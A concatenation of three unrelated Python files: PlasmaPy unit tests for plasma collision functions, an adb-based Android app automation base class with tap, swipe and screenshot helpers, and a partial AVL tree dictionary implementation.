        result = impact_parameter(self.T, self.n_e, self.particles)
        resultRev = impact_parameter(self.T, self.n_e, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        methodVal = impact_parameter(
            self.T,
            self.n_e,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        bmin, bmax = methodVal
        methodVal = bmin.si.value, bmax.si.value
        testTrue = np.allclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
        errStr = f"Impact parameters should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        methodVal = impact_parameter(
            self.T,
            self.n_e,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        bmin, bmax = methodVal
        methodVal = bmin.si.value, bmax.si.value
        testTrue = not np.allclose(methodVal, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Impact parameter value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    def test_bad_method(self):
        """Testing failure when invalid method is passed."""
        with pytest.raises(ValueError):
            impact_parameter(
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="meow",
            )

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    @pytest.mark.parametrize(
        "kwargs",
        [
            {"method": "classical"},
            {"method": "GMS-1"},
            {"method": "GMS-2", "z_mean": 1.0},
            {"method": "GMS-3"},
            {"method": "GMS-4"},
            {"method": "GMS-5", "z_mean": 1.0},
            {"method": "GMS-6", "z_mean": 1.0},
        ],
    )
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(
            impact_parameter, insert_some_nans, insert_all_nans, kwargs
        )

    def test_extend_scalar_bmin(self):
        """
        Test to verify that if T is scalar and n is vector, bmin will be extended
        to the same length as bmax
        """
        (bmin, bmax) = impact_parameter(1 * u.eV, self.n_e_arr, self.particles)
        assert len(bmin) == len(bmax)
class Test_collision_frequency:
    """Tests for `collision_frequency` for e-p, e-e, and p-p pairs, with and
    without an explicit z_mean."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.n = 1e17 * u.cm ** -3
        self.particles = ("e", "p")
        self.electrons = ("e", "e")
        self.protons = ("p", "p")
        self.z_mean = 2.5
        self.V = 1e4 * u.km / u.s
        # Expected SI frequencies for each pairing (regression constants)
        self.True1 = 1.3468281539854646e12
        self.True_electrons = 1904702641552.1638
        self.True_protons = 44450104815.91857
        self.True_zmean = 1346828153985.4646

    def test_symmetry(self):
        # Frequency must be invariant under particle-order swap
        with pytest.warns(CouplingWarning):
            result = collision_frequency(self.T, self.n, self.particles)
            resultRev = collision_frequency(self.T, self.n, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = collision_frequency(
                self.T,
                self.n,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = f"Collision frequency should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = collision_frequency(
                self.T,
                self.n,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Collision frequency value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    @pytest.mark.parametrize(
        "kwargs",
        [
            {"particles": ("e", "e")},
            {"particles": ("e", "p")},
            {"particles": ("p", "p")},
        ],
    )
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans, kwargs):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(
            collision_frequency, insert_some_nans, insert_all_nans, kwargs
        )

    def test_electrons(self):
        """
        Testing collision frequency between electrons.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = collision_frequency(
                self.T,
                self.n,
                self.electrons,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(
            self.True_electrons, methodVal.si.value, rtol=1e-1, atol=0.0
        )
        errStr = (
            f"Collision frequency should be {self.True_electrons} and "
            f"not {methodVal}."
        )
        assert testTrue, errStr

    def test_protons(self):
        """
        Testing collision frequency between protons (ions).
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = collision_frequency(
                self.T,
                self.n,
                self.protons,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(
            self.True_protons, methodVal.si.value, rtol=1e-1, atol=0.0
        )
        errStr = (
            f"Collision frequency should be {self.True_protons} and "
            f"not {methodVal}."
        )
        assert testTrue, errStr

    def test_zmean(self):
        """
        Test collisional frequency function when given arbitrary z_mean.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = collision_frequency(
                self.T,
                self.n,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = (
            f"Collision frequency should be {self.True_zmean} and " f"not {methodVal}."
        )
        assert testTrue, errStr
class Test_fundamental_electron_collision_freq:
    """Array-handling tests for `fundamental_electron_collision_freq`."""

    @classmethod
    def setup_class(self):
        """Set up shared fixture values."""
        self.ion = "p"
        self.coulomb_log = 10
        self.T_arr = np.array([1, 2]) * u.eV
        self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3

    # TODO: array coulomb log
    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Verify that numpy array quantities are handled."""
        assert_can_handle_nparray(
            fundamental_electron_collision_freq,
            insert_some_nans,
            insert_all_nans,
            {},
        )
class Test_fundamental_ion_collision_freq:
    """Array-handling tests for `fundamental_ion_collision_freq`."""

    @classmethod
    def setup_class(self):
        """Set up shared fixture values."""
        self.ion = "p"
        self.coulomb_log = 10
        self.T_arr = np.array([1, 2]) * u.eV
        self.n_arr = np.array([1e20, 2e20]) * u.cm ** -3

    # TODO: array coulomb log
    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Verify that numpy array quantities are handled."""
        assert_can_handle_nparray(
            fundamental_ion_collision_freq,
            insert_some_nans,
            insert_all_nans,
            {},
        )
class Test_mean_free_path:
    """Tests for `mean_free_path`."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.n_e = 1e17 * u.cm ** -3
        self.particles = ("e", "p")
        self.z_mean = 2.5
        self.V = 1e4 * u.km / u.s
        # Expected SI mean free path (regression constant)
        self.True1 = 4.4047571877932046e-07

    def test_symmetry(self):
        # Mean free path must be invariant under particle-order swap
        with pytest.warns(CouplingWarning):
            result = mean_free_path(self.T, self.n_e, self.particles)
            resultRev = mean_free_path(self.T, self.n_e, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = mean_free_path(
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = f"Mean free path should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = mean_free_path(
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Mean free path value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(mean_free_path, insert_some_nans, insert_all_nans, {})
class Test_Spitzer_resistivity:
    """Tests for `Spitzer_resistivity`, with and without an explicit z_mean."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.n = 1e12 * u.cm ** -3
        self.particles = ("e", "p")
        self.z_mean = 2.5
        self.V = 1e4 * u.km / u.s
        # Expected SI resistivities (regression constants)
        self.True1 = 1.2665402649805445e-3
        self.True_zmean = 0.00020264644239688712

    def test_symmetry(self):
        # Resistivity must be invariant under particle-order swap
        result = Spitzer_resistivity(self.T, self.n, self.particles)
        resultRev = Spitzer_resistivity(self.T, self.n, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        methodVal = Spitzer_resistivity(
            self.T,
            self.n,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = f"Spitzer resistivity should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        methodVal = Spitzer_resistivity(
            self.T,
            self.n,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Spitzer resistivity value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    def test_zmean(self):
        """Testing Spitzer when z_mean is passed."""
        methodVal = Spitzer_resistivity(
            self.T,
            self.n,
            self.particles,
            z_mean=self.z_mean,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = (
            f"Spitzer resistivity should be {self.True_zmean} and " f"not {methodVal}."
        )
        assert testTrue, errStr

    # TODO vector z_mean
    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(
            Spitzer_resistivity, insert_some_nans, insert_all_nans, {}
        )
class Test_mobility:
    """Tests for `mobility`, with and without an explicit z_mean."""

    @classmethod
    def setup_class(self):
        """initializing parameters for tests """
        self.T = 11604 * u.K
        self.n_e = 1e17 * u.cm ** -3
        self.particles = ("e", "p")
        self.z_mean = 2.5
        self.V = 1e4 * u.km / u.s
        # Expected SI mobilities (regression constants)
        self.True1 = 0.13066090887074902
        self.True_zmean = 0.32665227217687254

    def test_symmetry(self):
        # Mobility must be invariant under particle-order swap
        with pytest.warns(CouplingWarning):
            result = mobility(self.T, self.n_e, self.particles)
            resultRev = mobility(self.T, self.n_e, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """
        Test for known value.
        """
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = mobility(
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True1, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = f"Mobility should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = mobility(
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = not np.isclose(methodVal.si.value, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Mobility value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    def test_zmean(self):
        """Testing mobility when z_mean is passed."""
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = mobility(
                self.T,
                self.n_e,
                self.particles,
                z_mean=self.z_mean,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True_zmean, methodVal.si.value, rtol=1e-1, atol=0.0)
        errStr = f"Mobility should be {self.True_zmean} and " f"not {methodVal}."
        assert testTrue, errStr

    # TODO vector z_mean
    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities"""
        assert_can_handle_nparray(mobility, insert_some_nans, insert_all_nans, {})
class Test_Knudsen_number:
    """Tests for `Knudsen_number`."""

    @classmethod
    def setup_class(cls):
        """Initialize parameters shared by all tests in this class."""
        # `cls`, not `self`, is the idiomatic first argument of a classmethod.
        cls.length = 1 * u.nm
        cls.T = 11604 * u.K
        cls.n_e = 1e17 * u.cm ** -3
        cls.particles = ("e", "p")
        cls.z_mean = 2.5
        cls.V = 1e4 * u.km / u.s
        cls.True1 = 440.4757187793204

    def test_symmetry(self):
        """Knudsen number must be invariant under particle-order reversal."""
        with pytest.warns(CouplingWarning):
            result = Knudsen_number(self.length, self.T, self.n_e, self.particles)
            resultRev = Knudsen_number(
                self.length, self.T, self.n_e, self.particles[::-1]
            )
        assert result == resultRev

    def test_known1(self):
        """Test for known value."""
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Knudsen_number(
                self.length,
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        testTrue = np.isclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
        errStr = f"Knudsen number should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        with pytest.warns(exceptions.PhysicsWarning, match="strong coupling effects"):
            methodVal = Knudsen_number(
                self.length,
                self.T,
                self.n_e,
                self.particles,
                z_mean=np.nan * u.dimensionless_unscaled,
                V=np.nan * u.m / u.s,
                method="classical",
            )
        # NOTE(review): this uses atol where the sibling tests use rtol —
        # confirm the absolute tolerance is intended here.
        testTrue = not np.isclose(methodVal, fail1, rtol=0.0, atol=1e-16)
        errStr = (
            f"Knudsen number value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities."""
        assert_can_handle_nparray(Knudsen_number, insert_some_nans, insert_all_nans, {})
class Test_coupling_parameter:
    """Tests for `coupling_parameter`."""

    @classmethod
    def setup_class(cls):
        """Initialize parameters shared by all tests in this class."""
        # `cls`, not `self`, is the idiomatic first argument of a classmethod.
        cls.T = 11604 * u.K
        cls.n_e = 1e21 * u.cm ** -3
        cls.particles = ("e", "p")
        cls.z_mean = 2.5
        cls.V = 1e4 * u.km / u.s
        cls.True1 = 2.3213156755481195
        cls.True_zmean = 10.689750083758698
        cls.True_quantum = 0.3334662805238162

    def test_symmetry(self):
        """Coupling parameter must be invariant under particle-order reversal."""
        result = coupling_parameter(self.T, self.n_e, self.particles)
        resultRev = coupling_parameter(self.T, self.n_e, self.particles[::-1])
        assert result == resultRev

    def test_known1(self):
        """Test for known value."""
        methodVal = coupling_parameter(
            self.T,
            self.n_e,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = np.isclose(self.True1, methodVal, rtol=1e-1, atol=0.0)
        errStr = f"Coupling parameter should be {self.True1} and " f"not {methodVal}."
        assert testTrue, errStr

    def test_fail1(self):
        """
        Tests if test_known1() would fail if we slightly adjusted the
        value comparison by some quantity close to numerical error.
        """
        fail1 = self.True1 * (1 + 1e-15)
        methodVal = coupling_parameter(
            self.T,
            self.n_e,
            self.particles,
            z_mean=np.nan * u.dimensionless_unscaled,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = not np.isclose(methodVal, fail1, rtol=1e-16, atol=0.0)
        errStr = (
            f"Coupling parameter value test gives {methodVal} and "
            f"should not be equal to {fail1}."
        )
        assert testTrue, errStr

    def test_zmean(self):
        """Test value obtained when arbitrary z_mean is passed."""
        methodVal = coupling_parameter(
            self.T,
            self.n_e,
            self.particles,
            z_mean=self.z_mean,
            V=np.nan * u.m / u.s,
            method="classical",
        )
        testTrue = np.isclose(self.True_zmean, methodVal, rtol=1e-1, atol=0.0)
        errStr = (
            f"Coupling parameter should be {self.True_zmean} and " f"not {methodVal}."
        )
        assert testTrue, errStr

    # TODO vector z_mean
    @pytest.mark.parametrize("insert_some_nans", [[], ["V"]])
    @pytest.mark.parametrize("insert_all_nans", [[], ["V"]])
    # @pytest.mark.parametrize("kwargs", [{"method": "classical"},
    #                                    {"method": "quantum"},])  # TODO quantum issues
    def test_handle_nparrays(self, insert_some_nans, insert_all_nans):
        """Test for ability to handle numpy array quantities."""
        assert_can_handle_nparray(
            coupling_parameter, insert_some_nans, insert_all_nans, {}
        )

    @pytest.mark.xfail(
        reason="see issue https://github.com/PlasmaPy/PlasmaPy/issues/726"
    )
    def test_quantum(self):
        """Testing quantum method for coupling parameter."""
        methodVal = coupling_parameter(
            self.T, self.n_e, self.particles, method="quantum"
        )
        testTrue = np.isclose(self.True_quantum, methodVal, rtol=1e-1, atol=0.0)
        errStr = (
            f"Coupling parameter should be {self.True_quantum} and " f"not {methodVal}."
        )
        assert testTrue, errStr

    def test_kwarg_method_error(self):
        """Testing kwarg `method` fails if not 'classical' or 'quantum'."""
        with pytest.raises(ValueError):
            coupling_parameter(self.T, self.n_e, self.particles, method="not a method")
|
# -*- coding: utf-8 -*-
'''
create by: 小宝
mail: <EMAIL>
create date: 2019.8.3
Purpose: base class be used to app extends
'''
import sys
import re
import random
import time
import base64
from PIL import Image
sys.path.append('../')
from common.auto_adb import auto_adb
from common import config
from common import screenshot
from common import debug
class app():
    """Base class for adb-driven app automation.

    Wraps common device operations (launching activities, tapping,
    swiping, screenshots) around a shared `auto_adb` instance.
    """

    adb = auto_adb()

    def __init__(self):
        # Verify a device is connected before doing anything else.
        self.adb.test_device()
        # Optionally dump device info for debugging:
        # debug.dump_device_info()

    def _open_app(self, main_activity, delay):
        """Launch `main_activity` unless it is already focused.

        Returns True when the activity is (or becomes) focused, False
        otherwise.  `delay` is the number of seconds to wait after the
        launch command before re-checking.
        """
        if self._is_focused_activity_super(main_activity):
            return True
        cmd = 'shell am start -n {activity}'.format(
            activity=main_activity
        )
        self.adb.run(cmd)
        time.sleep(delay)
        if self._is_focused_activity_super(main_activity):
            return True
        print('目前未能显示主页窗口可能原因:息屏状态、被弹窗覆盖等,重试中...')
        return False

    def _is_focused_activity_super(self, activity):
        """Return True if `activity` appears in the focused-window dump.

        NOTE(review): the pipe uses `findstr`, which is Windows-only —
        presumably the host running this script is Windows; confirm.
        """
        cmd = 'shell dumpsys window | findstr mFocusedWindow'
        output = self.adb.run(cmd)
        return output.find(activity, 0, len(output)) >= 0

    def set_ime(self, ime):
        """Select the input method named by config key `ime`, exiting the
        process if it is not installed or cannot be selected."""
        config_data = config.open_accordant_config('common')
        name = config_data[ime]['name']
        # 1. Check the IME is installed.
        cmd = 'shell ime list -a'
        output = self.adb.run(cmd)
        if output.find(name, 0, len(output)) < 0:
            print('未安装{}输入法,安装后使用!'.format(name))
            exit(0)
        # 2. Select the IME; adb reports 'selected' on success.
        cmd = 'shell ime set {}'.format(name)
        output = self.adb.run(cmd)
        if output.find('selected', 0, len(output)) < 0:
            print('设置{}输入法失败,手动设置后使用'.format(name))
            exit(0)

    def _click_operate(self, current, x, y, delay, expect='', retry=0):
        """Tap (x, y) while `current` is focused; optionally verify that
        `expect` becomes the focused activity, re-checking up to `retry`
        times.  Returns True on success, False otherwise.
        """
        if not self._is_focused_activity_super(current):
            return False
        cmd = 'shell input tap {x} {y}'.format(
            x=x + self._random_bias(10),
            y=y + self._random_bias(10)
        )
        self.adb.run(cmd)
        time.sleep(delay)
        if expect == '':
            return True
        # NOTE: retries only re-check focus; they do not tap again or sleep.
        for _ in range(retry):
            if self._is_focused_activity_super(expect):
                return True
        return False

    def click(self, x, y):
        """Tap the screen near (x, y) with a small random offset."""
        cmd = 'shell input tap {x} {y}'.format(
            x=x + self._random_bias(10),
            y=y + self._random_bias(10)
        )
        self.adb.run(cmd)

    def _random_bias(self, num):
        """Return a random offset in [-num, num] to humanize tap positions."""
        return random.randint(-num, num)

    def swipe_operate(self, x1, y1, x2, y2, delay, duration=200):
        """Swipe from (x1, y1) to (x2, y2) over `duration` ms, then wait
        `delay` seconds."""
        cmd = 'shell input swipe {x1} {y1} {x2} {y2} {duration}'.format(
            x1=x1,
            y1=y1,
            x2=x2,
            y2=y2,
            duration=duration
        )
        self.adb.run(cmd)
        time.sleep(delay)

    def back_expect_page(self, current_activity, expect_activity, delay, retry):
        """Press BACK (keyevent 4) up to `retry` times until
        `expect_activity` becomes focused.  Returns True on success.

        Fix: the original referenced the loop variable after the loop,
        raising NameError when retry == 0; a counter is used instead.
        """
        cmd = 'shell input keyevent 4'
        if not self._is_focused_activity_super(current_activity):
            return False
        attempts = 0
        for _ in range(retry):
            self.adb.run(cmd)
            attempts += 1
            time.sleep(delay)
            if self._is_focused_activity_super(expect_activity):
                return True
        print('已完成操作,尝试返回{}'.format(attempts))
        return False

    def screen_to_img(self, name='', region=()):
        """Take a screenshot and return its bytes; optionally crop to
        `region` (a 4-tuple box) and save to `name` first.

        NOTE(review): when `region` is empty nothing is written here —
        presumably `screenshot.pull_screenshot()` already saved
        './tmp/screen.png'; confirm against that helper.
        """
        im = screenshot.pull_screenshot()
        if not name:
            name = './tmp/screen.png'
        if region:
            crop_img = im.crop(region)
            crop_img.save(name)
        with open(name, 'rb') as bin_data:
            image = bin_data.read()
        return image
|
<reponame>en0/pyavl3
from typing import Hashable, Tuple, Iterator, Iterable, Union, Dict
from .avl_node import AVLNode
from .interface import ADTInterface
from .traversal import InOrderTraversal, BreadthFirstTraversal
class AVLTree(ADTInterface):
    # Traversal strategy used by the iterator methods; override to change
    # iteration order (default is in-order, i.e. sorted by key).
    traversal = InOrderTraversal
    @property
    def root(self) -> AVLNode:
        """Gets the current root"""
        return self._root
    def __init__(
        self,
        iterable: Union[
            Dict[Hashable, any],
            Iterable[Tuple[Hashable, any]],
            "AVLTree"
        ] = None,
        **kwargs,
    ) -> None:
        """Build a tree from a dict, an iterable of pairs, another AVLTree,
        and/or keyword arguments (same accepted forms as `update`)."""
        self._root: AVLNode
        self._n: int
        self.clear()
        if isinstance(iterable, dict):
            for k, v in iterable.items():
                self[k] = v
        elif isinstance(iterable, AVLTree):
            # Breadth-first copy avoids rebalances while rebuilding.
            for n in BreadthFirstTraversal(iterable, lambda x: x):
                self[n.key] = n.value
        elif iterable is not None:
            for k, v in iterable:
                self[k] = v
        for k, v in kwargs.items():
            self[k] = v
    def __getitem__(self, key: Hashable) -> any:
        """Get the value at the given key.
        If the key is not found, a KeyError will be raised.
        O(logn) - The AVL tree is balanced, h is always near log(n).
        """
        node = self._get(self._root, key)
        if node is None:
            raise KeyError(key)
        return node.value
    def __setitem__(self, key: Hashable, value: any) -> None:
        """Add or Update the given key using the given value.
        O(logn) - The AVL tree is balanced, h is always near log(n).
                  rebalance operation is done in-line on stack return.
        """
        node = AVLNode(key, value)
        self._root = self._insert(self._root, node)
    def __delitem__(self, key: Hashable) -> None:
        """Remove the given key from the tree.
        O(logn) - Delete operation might have to do a secondary lookup
                  when swapping nodes in worst-case deletes. The actual
                  execution might be 2logn if a delete requires a swap
        """
        self._root = self._delete(self._root, key)
    def __len__(self) -> int:
        """Return the count of members in the tree.
        O(1) - length is maintained during operations that modify it.
        """
        return self._n
    def __contains__(self, key: Hashable) -> bool:
        """Check if a given key exists in the tree
        O(logn) - The AVL tree is balanced, h is always near log(n).
        """
        return self._get(self._root, key) is not None
    def __iter__(self) -> Iterator[Tuple[Hashable, any]]:
        """Create and return an iterator
        By default this creates an InOrderTraversal iterator. This
        functionality can be overridden by setting AVLTree.traversal
        to another implementation.
        O(n) - and that is all i am going to say about that.
        """
        return AVLTree.traversal(self, lambda x: x.key)
    def __repr__(self) -> str:
        """Return a string representation of the AVLTree
        O(n) - This repr prints every member much like dict.
        """
        m = BreadthFirstTraversal(self, lambda x: f"{x.key}: {x.value}")
        s = ", ".join(m)
        return f"<AVL {{{s}}}>"
    def __bool__(self) -> bool:
        """Return True if the Tree has members. Else, false.
        O(1) - because root is not null.
        """
        return self._root is not None
    def get(self, key: Hashable, default: any = None) -> any:
        """Get the value at the given key or default.
        O(logn) - The AVL tree is balanced, h is always near log(n).
        """
        node = self._get(self._root, key)
        if node is None:
            return default
        return node.value
    def keys(self) -> Iterator[Hashable]:
        """Create and return a key iterator
        By default this creates an InOrderTraversal iterator. This
        functionality can be overridden by setting AVLTree.traversal
        to another implementation.
        O(n) - and that is all i am going to say about that.
        """
        return AVLTree.traversal(self, lambda x: x.key)
    def items(self) -> Iterator[Tuple[Hashable, any]]:
        """Create and return a item iterator
        By default this creates an InOrderTraversal iterator. This
        functionality can be overridden by setting AVLTree.traversal
        to another implementation.
        O(n) - and that is all i am going to say about that.
        """
        return AVLTree.traversal(self, lambda x: (x.key, x.value))
    def values(self) -> Iterator[Hashable]:
        """Create and return a value iterator
        By default this creates an InOrderTraversal iterator. This
        functionality can be overridden by setting AVLTree.traversal
        to another implementation.
        O(n) - and that is all i am going to say about that.
        """
        return AVLTree.traversal(self, lambda x: x.value)
    def clear(self) -> None:
        """Clear all nodes from the tree.
        O(1) - If you ignore GC
        """
        self._root = None
        self._n = 0
    def copy(self) -> "AVLTree":
        """A shallow copy of the AVLTree
        O(n) - When copying the order is done in a way that
               avoids rebalance operations. It's as quick as
               it can be without magic.
        """
        # using a breadth first traversal will eliminate the need
        # for rebalances needed when constructing the new root.
        return AVLTree(self)
    def setdefault(self, key: Hashable, value: any) -> None:
        """Insert key with the given value into the tree if it does not exist.
        O(logn) - The AVL tree is balanced, h is always near log(n).
        """
        if key not in self:
            self[key] = value
    def update(
        self,
        iterable: Union[
            Dict[Hashable, any],
            Iterable[Tuple[Hashable, any]],
            "AVLTree"
        ] = None,
        **kwargs
    ) -> None:
        """Update the AVLTree using keys from given iterable
        O(vlogn) - where v is the number of items being updated.
        """
        if isinstance(iterable, dict):
            for k, v in iterable.items():
                self[k] = v
        elif isinstance(iterable, AVLTree):
            for n in BreadthFirstTraversal(iterable, lambda x: x):
                self[n.key] = n.value
        elif iterable is not None:
            for k, v in iterable:
                self[k] = v
        for k, v in kwargs.items():
            self[k] = v
    def pop(self, key: Hashable) -> any:
        """Pop an item out of the Tree and return the value.
        O(logn) - This method actually calls 2 logn methods.
        """
        _, value = self.popitem(key)
        return value
    def popitem(self, key: Hashable) -> Tuple[Hashable, any]:
        """Pop an item out of the Tree and return the key and value.
        O(logn) - This method actually calls 2 logn methods.
        """
        n = self._get(self._root, key)
        if n is None:
            raise KeyError(key)
        self._root = self._delete(self._root, n.key)
        return n.key, n.value
    @classmethod
    def fromkeys(cls, iterable: Iterable[Hashable], value: any = None) -> "AVLTree":
        """Returns a new AVLTree with keys from iterable and values equal to value.
        O(n) - Rebalance operations are likely so it's a slow O(n)
        """
        return AVLTree([(k, value) for k in iterable])
    def _get(self, root: AVLNode, key: Hashable) -> AVLNode:
        """Find a key in the given subtree"""
        if root is None:
            # Key is not in subtree
            return None
        elif key < root.key:
            # If key exists, it must be left
            return self._get(root.left, key)
        elif key > root.key:
            # If key exists, it must be right
            return self._get(root.right, key)
        elif key == root.key:
            # Found it.
            return root
    def _delete(self, root: AVLNode, key: Hashable) -> AVLNode:
        """Find and remove the given key from the given subtree."""
